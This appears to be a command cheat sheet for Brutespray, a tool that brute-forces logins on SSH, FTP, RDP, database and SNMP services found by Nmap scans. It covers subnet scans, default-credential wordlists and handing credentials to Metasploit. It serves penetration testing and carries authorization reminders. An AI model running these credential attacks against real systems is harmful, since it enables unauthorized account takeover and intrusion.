Skip to content
1337skills 1337skills

Brutespray

Brutespray automates brute force attacks against services discovered by Nmap. It integrates with Metasploit modules for rapid credential testing across multiple protocols.

Installation

Linux/Ubuntu

# From repository
git clone https://github.com/x90skysn3k/brutespray.git
cd brutespray
pip3 install -r requirements.txt

# Make executable
chmod +x brutespray.py
sudo ln -s $(pwd)/brutespray.py /usr/local/bin/brutespray

Prerequisites

# Install dependencies
sudo apt install nmap python3-pip
pip3 install pycurl paramiko

# Metasploit (optional but recommended)
sudo apt install metasploit-framework

Basic Usage

Nmap Integration

# Run Nmap scan and save to file
nmap -sV -p- target.com -oX nmap_results.xml

# Run Brutespray on Nmap results
python3 brutespray.py -f nmap_results.xml -t 4

# Nmap scan and pipe directly to Brutespray
nmap -sV -p- target.com -oX - | python3 brutespray.py -f - -t 5

Command-Line Options

OptionDescription
-f, --file <FILE>Nmap XML output file
-t, --threads <NUM>Number of threads (default: 5)
-u, --username <USER>Single username to test
-U, --userlist <FILE>Username list file
-P, --passwordlist <FILE>Password list file
-p, --port <PORT>Specific port to attack
-s, --service <SERVICE>Specific service to attack
--snmpAlso attempt SNMP community strings
--verboseVerbose output
--dry-runShow what would be executed

Practical Examples

Basic Service Brute Force

# Scan network for services
nmap -sV --script smb-enum-shares -p 21,22,3306,3389,5432 192.168.1.0/24 -oX scan.xml

# Brutespray common credentials
python3 brutespray.py -f scan.xml -U users.txt -P passwords.txt -t 10

# Target specific service
python3 brutespray.py -f scan.xml -s ssh -U users.txt -P passwords.txt

SSH Brute Force via Nmap

# Find SSH services
nmap -p 22 --script ssh-brute 192.168.0.0/24 -oX ssh_scan.xml

# Brutespray SSH services
python3 brutespray.py -f ssh_scan.xml -U admin.txt -P wordlist.txt -t 4

FTP Brute Force

# Discover FTP services
nmap -p 21 --script ftp-brute 192.168.1.0/24 -oX ftp_scan.xml

# Brute force discovered FTP
python3 brutespray.py -f ftp_scan.xml -P ftp_passwords.txt -t 5

Database Services

# Find MySQL/PostgreSQL
nmap -sV -p 3306,5432 target.com -oX db_scan.xml

# Brute force databases
python3 brutespray.py -f db_scan.xml -U db_users.txt -P db_pass.txt -t 3

RDP Brute Force

# Scan for RDP services
nmap -sV -p 3389 192.168.1.0/24 -oX rdp_scan.xml

# Attack RDP with brutespray
python3 brutespray.py -f rdp_scan.xml -U domain_users.txt -P passwords.txt -t 2

Wordlist Selection

Credential Files

# Common usernames
echo -e "admin\nadministrator\nroot\ntest\nguest\nuser" > users.txt

# Default passwords
echo -e "password\n123456\nadmin123\ntest\nwelcome" > passwords.txt

# Database users
echo -e "root\nadmin\nsa\npostgres" > db_users.txt

# FTP accounts
echo -e "anonymous\nftp\nadmin" > ftp_users.txt

# Download SecLists
git clone https://github.com/danielmiessler/SecLists.git

SNMP Enumeration

# Include SNMP community string testing
python3 brutespray.py -f nmap_results.xml --snmp -t 8

# Custom SNMP strings
echo -e "public\nprivate\ncommunity\n123456" > snmp_strings.txt

Metasploit Integration

# Export successful credentials to Metasploit database
python3 brutespray.py -f scan.xml -U users.txt -P pass.txt --msf

# Use found credentials in Metasploit modules
msfconsole
use auxiliary/scanner/smb/smb_version
set RHOSTS file:discovered_hosts.txt
run

Advanced Techniques

Custom Service Targeting

# Target specific port/service combination
python3 brutespray.py -f results.xml -p 2222 -s ssh -U users.txt -P pass.txt

# Multiple services from single scan
python3 brutespray.py -f full_scan.xml \
  -s ssh,ftp,smb \
  -U userlist.txt \
  -P wordlist.txt

Handling Large Scans

# Increase thread count for parallel execution
python3 brutespray.py -f network_scan.xml -t 50 -U users.txt -P pass.txt

# Dry-run to preview targets
python3 brutespray.py -f scan.xml --dry-run

Verbose Logging

# Full output and debugging
python3 brutespray.py -f scan.xml -U users.txt -P pass.txt --verbose -t 5 | tee brutespray_log.txt

Workflow Example

Complete Assessment

# 1. Network reconnaissance
nmap -sV --script smb-enum-shares,ssh-hostkey,mysql-info -p- 192.168.1.0/24 -oX network_assessment.xml

# 2. Run Brutespray
python3 brutespray.py -f network_assessment.xml \
  -U /usr/share/wordlists/default_users.txt \
  -P /usr/share/wordlists/100-worst-passwords.txt \
  -t 10 \
  --verbose

# 3. Review results
cat brutespray_results.txt | grep -i "found\|success"

# 4. Exploitation (with proper authorization)
# Use discovered credentials with exploit modules

Troubleshooting

Common Issues

Services not detected

# Ensure Nmap includes service detection
nmap -sV -A --script default target.com -oX output.xml

# Verify XML format
file nmap_results.xml

Slow performance

# Increase thread count
python3 brutespray.py -f scan.xml -t 50

# Reduce timeout per attempt
# (Modify in source code if needed)

Authentication failures on valid credentials

# Try with verbose mode to debug
python3 brutespray.py -f scan.xml --verbose

# Check service compatibility
# Not all services/wordlists work together

Best Practices

  • Always get written authorization before testing
  • Use appropriate thread counts (5-10 for stealth, higher for lab)
  • Combine with intelligence gathering for targeted wordlists
  • Monitor for account lockouts
  • Test in controlled environments first
  • Use unique identifiers to track test runs
  • Document all discovered credentials
  • Clean up after testing (remove test accounts)
  • Follow responsible disclosure procedures
  • Combine findings with other vulnerability assessments

Last updated: 2025-03-30 | Brutespray GitHub